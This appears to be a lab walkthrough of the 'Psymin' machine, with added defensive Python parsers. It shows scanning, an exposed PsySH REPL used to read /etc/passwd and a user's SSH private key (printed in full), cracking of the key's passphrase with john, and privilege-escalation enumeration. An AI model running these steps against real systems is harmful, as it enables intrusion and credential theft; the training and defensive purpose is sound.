(° ー °〃) Psymin
Information Gathering
Port Scanning
┌──(kali㉿kali)-[~/temp/Psymin]
└─$ rustscan -a $IP -- -sCV
[RustScan ASCII banner]
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
HACK THE PLANET

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.100:22
Open 192.168.10.100:80
Open 192.168.10.100:3000

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzUvGOaZF4gJoYBGR4NrMZOj32x98uVDUQ0dY0RENRdIyokD8RvJG8g9g71aoh/20m4mcEEdSyp+eE9ABu1kwk=
|   256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrNZ9AQg+cgX4w0wabsDTAVeo9/VWThsF5efc2OzsFo
80/tcp   open  http    syn-ack nginx 1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
3000/tcp open  ppp?    syn-ack
| fingerprint-strings: 
|   DNSStatusRequestTCP: 
|     ^@^L^@^@^P^@^@^@^@^@^@^@^@^@Psy Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     OPTIONS / RTSP/1.0
|   DNSVersionBindReqTCP: 
|     ^CPsy Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|   GenericLines, NULL: 
|     Psy Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|   GetRequest: 
|     GET / HTTP/1.0
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     HTTP/1.0
|     Error Undefined constant "GET".
|   HTTPOptions: 
|     OPTIONS / HTTP/1.0
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     OPTIONS / HTTP/1.0
|     Error Undefined constant "OPTIONS".
|   Help: 
|     HELP
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     HELP
|     Error Undefined constant "HELP".
|   NCP: 
|     DmdT^@^@^@
|     ^@^@^@^A^@^@^@^@
|   RTSPRequest: 
|     OPTIONS / RTSP/1.0
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     OPTIONS / RTSP/1.0
|     Error Undefined constant "OPTIONS".
|   SSLSessionReq: 
|     ^C^A^@Psy Shell v0.12.4 (PHP 8.2.20 
|_    cli) by Justin Hileman
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=9/7%Time=66DC1CBF%P=x86_64-pc-linux-gnu%r(
SF:NULL,3C,"Psy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94
SF:\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\x20")%r(GenericLines,4C,"Psy\
SF:x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20
SF:by\x20Justin\x20Hileman\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20")%
SF:r(GetRequest,99,"GET\x20/\x20HTTP/1\.0\r\n\r\n\r\n\r\nPsy\x20Shell\x20v
SF:0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\
SF:x20Hileman\r\n>\x20GET\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x
SF:20Undefined\x20constant\x20\"GET\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\r\n
SF:>\x20")%r(Help,7A,"HELP\r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\
SF:.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\x20HELP
SF:\r\n\r\n\x20\x20\x20Error\x20\x20Undefined\x20constant\x20\"HELP\"\.\r\
SF:n\r\n>\x20\r\n>\x20")%r(NCP,38,"DmdT\^@\^@\^@\x08\x20\x08\x08\x20\x08\x
SF:08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\
SF:x08\x20\x08\x08\x20\x08\^@\^@\^@\^A\^@\^@\^@\^@")%r(HTTPOptions,A5,"OPT
SF:IONS\x20/\x20HTTP/1\.0\r\n\r\n\r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PH
SF:P\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\
SF:x20OPTIONS\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x20Undefined\
SF:x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20")%
SF:r(RTSPRequest,A5,"OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\r\n\r\nPsy\x20Shell
SF:\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Ju
SF:stin\x20Hileman\r\n>\x20OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\x20\x20\x20Er
SF:ror\x20\x20Undefined\x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20
SF:\r\n>\x20\r\n>\x20")%r(DNSVersionBindReqTCP,3E,"\^CPsy\x20Shell\x20v0\.
SF:12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20
SF:Hileman\r\n>\x20")%r(DNSStatusRequestTCP,74,"\^@\^L\^@\^@\^P\^@\^@\^@\^
SF:@\^@\^@\^@\^@\^@Psy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\
SF:x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\x20\^L\x07\r>\x20OPTIO
SF:NS\x20/\x20RTSP/1\.0\x07\x07\x07\x07")%r(SSLSessionReq,42,"\^C\^A\^@Psy
SF:\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x2
SF:0by\x20Justin\x20Hileman\r\n>\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
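The fingerprint nmap printed for port 3000 says more than the `ppp?` guess: the `SF:` block is the raw bytes every probe got back, and it already contains the PsySH banner. The following Python is an added example, not part of the original write-up: it parses an nmap service-fingerprint block, unescapes each probe's response, checks it against the declared length, and flags responses that carry a known interactive REPL banner or simply end in a prompt. The sample input is the NULL and GenericLines probes copied from the scan above and closed off with `");` so the excerpt is a complete fingerprint on its own; the banner table is a constructed starting point, not an nmap signature.

```python
import re
from typing import Optional

# Sample input, constructed from the scan above: the first two probes (NULL and
# GenericLines) of the port-3000 fingerprint, cut after GenericLines and closed
# with ");" so the excerpt is a well-formed fingerprint by itself.
SAMPLE_FINGERPRINT = r'''
SF-Port3000-TCP:V=7.94SVN%I=7%D=9/7%Time=66DC1CBF%P=x86_64-pc-linux-gnu%r(
SF:NULL,3C,"Psy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94
SF:\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\x20")%r(GenericLines,4C,"Psy\
SF:x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20
SF:by\x20Justin\x20Hileman\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20");
'''

_HEADER = re.compile(r'^SF-Port(\d+)-(\w+):(.*)$')
# %r(ProbeName,HexLength,"escaped response")
_PROBE = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{2}|.)', re.S)
_SIMPLE = {'r': b'\r', 'n': b'\n', 't': b'\t', '0': b'\0'}

# Constructed table of banners that should never be reachable unauthenticated.
KNOWN_REPL_BANNERS = {b'Psy Shell': 'psysh'}


def unescape(text: str) -> bytes:
    """Turn nmap's escaped response string back into the bytes seen on the wire."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(text):
        out += text[pos:m.start()].encode('latin-1')
        tok = m.group(1)
        if len(tok) == 3:            # \xHH: one arbitrary byte
            out.append(int(tok[1:], 16))
        elif tok in _SIMPLE:         # \r \n \t \0
            out += _SIMPLE[tok]
        else:                        # \( \) \. \" \\ : the character itself
            out += tok.encode('latin-1')
        pos = m.end()
    out += text[pos:].encode('latin-1')
    return bytes(out)


def parse_service_fingerprint(text: str) -> dict:
    """Parse one SF-Port block into scan metadata and per-probe responses."""
    port = proto = None
    body = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _HEADER.match(line)
        if m:
            port, proto = int(m.group(1)), m.group(2)
            body.append(m.group(3))
        elif line.startswith('SF:'):
            body.append(line[3:])    # continuation lines join with nothing in between
    if port is None:
        raise ValueError('no SF-Port header found')
    joined = ''.join(body)
    meta_text = joined.split('%r(', 1)[0]
    meta = dict(kv.split('=', 1) for kv in meta_text.split('%') if '=' in kv)
    probes = {}
    for m in _PROBE.finditer(joined):
        declared = int(m.group(2), 16)
        data = unescape(m.group(3))
        probes[m.group(1)] = {
            'declared_len': declared,
            'data': data,
            'length_ok': len(data) == declared,   # sanity check on the decode
        }
    return {'port': port, 'proto': proto, 'meta': meta, 'probes': probes}


def classify_banner(data: bytes) -> Optional[str]:
    """Label a response that looks like an interactive shell rather than a protocol."""
    for needle, label in KNOWN_REPL_BANNERS.items():
        if needle in data:
            return label
    # Unknown service that answers with a prompt character: still worth a look.
    if data.rstrip().endswith((b'>', b'$', b'#')) and b'HTTP/' not in data:
        return 'interactive-prompt'
    return None


def report(text: str) -> list:
    """(probe name, label) for every probe whose reply looks like a shell."""
    fp = parse_service_fingerprint(text)
    return [(name, classify_banner(p['data'])) for name, p in fp['probes'].items()
            if classify_banner(p['data'])]


if __name__ == '__main__':
    fp = parse_service_fingerprint(SAMPLE_FINGERPRINT)
    print(f"{fp['proto']}/{fp['port']} nmap {fp['meta'].get('V')}")
    for name, p in fp['probes'].items():
        print(f"  {name:14} {p['declared_len']:4d} bytes ok={p['length_ok']} "
              f"{p['data'][:40]!r}")
    print('findings:', report(SAMPLE_FINGERPRINT))
```

Feeding the full fingerprint from the scan into `parse_service_fingerprint` works the same way; the length check catches any `SF:` line that was lost or mangled when the output was copied.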
Directory Scanning
┌──(kali㉿kali)-[~/temp/Psymin]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   301,401,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 96152 / 441122 (21.80%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 96440 / 441122 (21.86%)
===============================================================
Finished
===============================================================
Vulnerability Discovery
Reconnaissance
Testing the sensitive port
Connect to port 3000 and try it out, using the PsySH command reference: https://github.com/bobthecow/psysh/wiki/Commands
┌──(kali㉿kali)-[~/temp/Psymin]
└─$ nc $IP 3000
Psy Shell v0.12.4 (PHP 8.2.20 — cli) by Justin Hileman
> $a = $b = 'c'
$a = $b = 'c'
WARNING: terminal is not fully functional
Press RETURN to continue
= "c"

> ls -la
ls -la
WARNING: terminal is not fully functional
Press RETURN to continue
Variables:
  $a   "c"
  $b   "c"
  $_   "c"
Run PHP from the REPL to read files:
> echo file_get_contents("/etc/passwd")
echo file_get_contents("/etc/passwd")
WARNING: terminal is not fully functional
Press RETURN to continue
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
alfred:x:1000:1000:alfred:/home/alfred:/bin/bash
Logging in with the private key
Read the SSH private key:
> echo file_get_contents("/home/alfred/.ssh/id_rsa")
echo file_get_contents("/home/alfred/.ssh/id_rsa")
WARNING: terminal is not fully functional
Press RETURN to continue
-----BEGIN OPENSSH PRIVATE KEY-----
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
mqXDfQ==
-----END OPENSSH PRIVATE KEY-----
Log in with the private key:
┌──(kali㉿kali)-[~/temp/Psymin]
└─$ vim alfred

┌──(kali㉿kali)-[~/temp/Psymin]
└─$ chmod 600 alfred

┌──(kali㉿kali)-[~/temp/Psymin]
└─$ ssh -i alfred alfred@$IP
The authenticity of host '192.168.10.100 (192.168.10.100)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.10.100' (ED25519) to the list of known hosts.
Enter passphrase for key 'alfred':
The key is passphrase-protected, so try cracking it:
┌──(kali㉿kali)-[~/temp/Psymin]
└─$ ssh2john alfred > hash

┌──(kali㉿kali)-[~/temp/Psymin]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alfredo          (alfred)
1g 0:00:00:58 DONE (2024-09-07 05:43) 0.01698g/s 15.21p/s 15.21c/s 15.21C/s molly..ilovegod
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
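John's two "Cost" lines come straight from the key file: an `openssh-key-v1` container begins with an unencrypted header naming the cipher, the KDF and the bcrypt round count (ssh-keygen's default is 16, exactly what john reported), and a key with a weak passphrase and default rounds falls to a wordlist in under a minute, as above. The Python below is an added example, not part of the original write-up: it parses that header so a key-hygiene audit can list keys that are stored unencrypted or use fewer rounds than the default. The fixture builder constructs headers with dummy key material; the second check runs on the first two base64 lines of the key read above, which carry the whole header and no private material.

```python
import base64
import struct

MAGIC = b'openssh-key-v1\x00'
BEGIN = '-----BEGIN OPENSSH PRIVATE KEY-----'
END = '-----END OPENSSH PRIVATE KEY-----'
DEFAULT_ROUNDS = 16   # ssh-keygen's default when -a is not given


def _string(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack('>I', len(data)) + data


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack('>I', buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def parse_header_bytes(blob: bytes) -> dict:
    """Decode the cleartext header that precedes the (possibly encrypted) key material."""
    if not blob.startswith(MAGIC):
        raise ValueError('not an openssh-key-v1 blob')
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    (nkeys,) = struct.unpack('>I', blob[off:off + 4])
    off += 4
    pub, off = _read_string(blob, off)         # public key blob, always cleartext
    key_type, _ = _read_string(pub, 0)
    rounds = None
    if kdf == b'bcrypt':                       # kdfoptions = string(salt) || uint32(rounds)
        _salt, o = _read_string(kdfopts, 0)
        (rounds,) = struct.unpack('>I', kdfopts[o:o + 4])
    return {
        'cipher': cipher.decode(), 'kdf': kdf.decode(), 'rounds': rounds,
        'nkeys': nkeys, 'key_type': key_type.decode(), 'encrypted': cipher != b'none',
    }


def parse_openssh_key_header(pem_text: str) -> dict:
    """Same as parse_header_bytes, starting from the PEM-wrapped file contents."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if len(lines) < 3 or lines[0] != BEGIN or lines[-1] != END:
        raise ValueError('not an OpenSSH private key file')
    return parse_header_bytes(base64.b64decode(''.join(lines[1:-1])))


def assess(header: dict) -> list:
    """Findings a key-hygiene audit would raise for this header."""
    findings = []
    if not header['encrypted']:
        findings.append('unencrypted private key: anyone who can read the file can use it')
    elif header['kdf'] != 'bcrypt':
        findings.append(f"unexpected kdf {header['kdf']!r}")
    elif header['rounds'] < DEFAULT_ROUNDS:
        findings.append(f"bcrypt rounds {header['rounds']} below ssh-keygen default {DEFAULT_ROUNDS}")
    return findings


def build_sample_key(cipher: bytes, kdf: bytes, salt: bytes, rounds: int,
                     key_type: bytes = b'ssh-ed25519') -> str:
    """Constructed fixture: a valid header over dummy key material (not a usable key)."""
    kdfopts = _string(salt) + struct.pack('>I', rounds) if kdf == b'bcrypt' else b''
    pub = _string(key_type) + _string(b'\x00' * 32)
    priv = b'\x00' * 64                        # placeholder; the parser never reads it
    blob = (MAGIC + _string(cipher) + _string(kdf) + _string(kdfopts)
            + struct.pack('>I', 1) + _string(pub) + _string(priv))
    b64 = base64.b64encode(blob).decode()
    body = '\n'.join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f'{BEGIN}\n{body}\n{END}\n'


# First two base64 lines of /home/alfred/.ssh/id_rsa as printed above: 105 bytes,
# which cover the whole header (cipher, kdf, salt, rounds, key count, key type).
PAGE_KEY_HEADER_B64 = (
    'b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBWOeeCO8'
    'Nm4oY6rWFVJWGSAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQDmBGltoOo9'
)


if __name__ == '__main__':
    for label, pem in [
        ('default', build_sample_key(b'aes256-ctr', b'bcrypt', b'\x01' * 16, 16)),
        ('weak', build_sample_key(b'aes256-ctr', b'bcrypt', b'\x02' * 16, 4)),
        ('plain', build_sample_key(b'none', b'none', b'', 0)),
    ]:
        h = parse_openssh_key_header(pem)
        print(label, h, assess(h))
    print('page key:', parse_header_bytes(base64.b64decode(PAGE_KEY_HEADER_B64)))
```

Note that the round count only sets the cost per guess; it does nothing for a passphrase that is in rockyou.txt, which is the real lesson of the john run above.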
Log in:
Privilege Escalation
Information Gathering
alfred@psymin:~$ sudo -l
-bash: sudo: orden no encontrada
alfred@psymin:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
alfred@psymin:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
alfred@psymin:~$ ss -tulnp
Netid State  Recv-Q Send-Q   Local Address:Port    Peer Address:Port Process
udp   UNCONN 0      0              0.0.0.0:68           0.0.0.0:*
udp   UNCONN 0      0              0.0.0.0:10000        0.0.0.0:*
tcp   LISTEN 0      128            0.0.0.0:22           0.0.0.0:*
tcp   LISTEN 0      511            0.0.0.0:80           0.0.0.0:*
tcp   LISTEN 0      5              0.0.0.0:3000         0.0.0.0:* users:(("socat",pid=466,fd=5))
tcp   LISTEN 0      4096         127.0.0.1:10000        0.0.0.0:*
tcp   LISTEN 0      128               [::]:22              [::]:*
tcp   LISTEN 0      511               [::]:80              [::]:*
alfred@psymin:~$ curl 0.0.0.0 1000
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
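The `ss -tulnp` listing already explains how PsySH ended up on the network: 0.0.0.0:3000 is owned by `socat`, a generic relay, while Webmin on 10000 is loopback-only. The Python below is an added example, not part of the original write-up: it parses such a listing and raises the findings a hardening review would want, namely wildcard listeners served by a relay program, wildcard TCP listeners with no visible owner, and loopback-only services to double-check. One caveat the sample illustrates: as a non-root user, `ss -p` only attributes sockets you own, so an empty Process column means another user's (here root's) service, not "no process". The sample input is a constructed copy of the listing above, and the relay-program set is an assumption to extend.

```python
import re

# Constructed copy of the `ss -tulnp` output above, taken as the unprivileged
# user alfred: only alfred's own socat carries a Process column.
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*
udp   UNCONN 0      0            0.0.0.0:10000      0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      511          0.0.0.0:80         0.0.0.0:*
tcp   LISTEN 0      5            0.0.0.0:3000       0.0.0.0:* users:(("socat",pid=466,fd=5))
tcp   LISTEN 0      4096       127.0.0.1:10000      0.0.0.0:*
tcp   LISTEN 0      128             [::]:22            [::]:*
tcp   LISTEN 0      511             [::]:80            [::]:*
"""

RELAY_PROGRAMS = {'socat', 'nc', 'ncat', 'netcat'}   # assumed list; extend as needed
WILDCARD = {'0.0.0.0', '[::]', '*'}
LOOPBACK = {'127.0.0.1', '[::1]'}
_PROC = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')


def parse_ss(text: str) -> list:
    """Rows of {'proto', 'state', 'addr', 'port', 'procs'} from `ss -tulnp` output."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the column header
        parts = line.split(None, 6)             # the 7th field (Process) may be absent
        if len(parts) < 6:
            continue
        netid, state, _recvq, _sendq, local, _peer = parts[:6]
        addr, _, port = local.rpartition(':')   # handles "[::]:22" and "0.0.0.0:22"
        procs = [(name, int(pid)) for name, pid in _PROC.findall(parts[6])] if len(parts) > 6 else []
        rows.append({'proto': netid, 'state': state, 'addr': addr,
                     'port': int(port) if port.isdigit() else port, 'procs': procs})
    return rows


def audit_listeners(rows: list) -> list:
    """(kind, proto, port, detail) findings a host-hardening review would raise."""
    findings = []
    for r in rows:
        if r['addr'] in WILDCARD:
            for name, pid in r['procs']:
                if name in RELAY_PROGRAMS:
                    # A relay on a wildcard bind exposes whatever it forwards to.
                    findings.append(('relay-exposed', r['proto'], r['port'], f'{name} pid {pid}'))
            if r['proto'] == 'tcp' and not r['procs']:
                # No owner shown: either another user's socket or ss was run without -p.
                findings.append(('unattributed', r['proto'], r['port'], r['addr']))
        elif r['addr'] in LOOPBACK:
            findings.append(('loopback-only', r['proto'], r['port'], r['addr']))
    return findings


if __name__ == '__main__':
    for kind, proto, port, detail in audit_listeners(parse_ss(SAMPLE_SS)):
        print(f'{kind:14} {proto}/{port:<6} {detail}')
```

Run as root (or with `CAP_NET_ADMIN`) the `unattributed` findings turn into named processes, which is the form this check should take in a scheduled audit.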
Uploading pspy64
Run it to watch for processes:
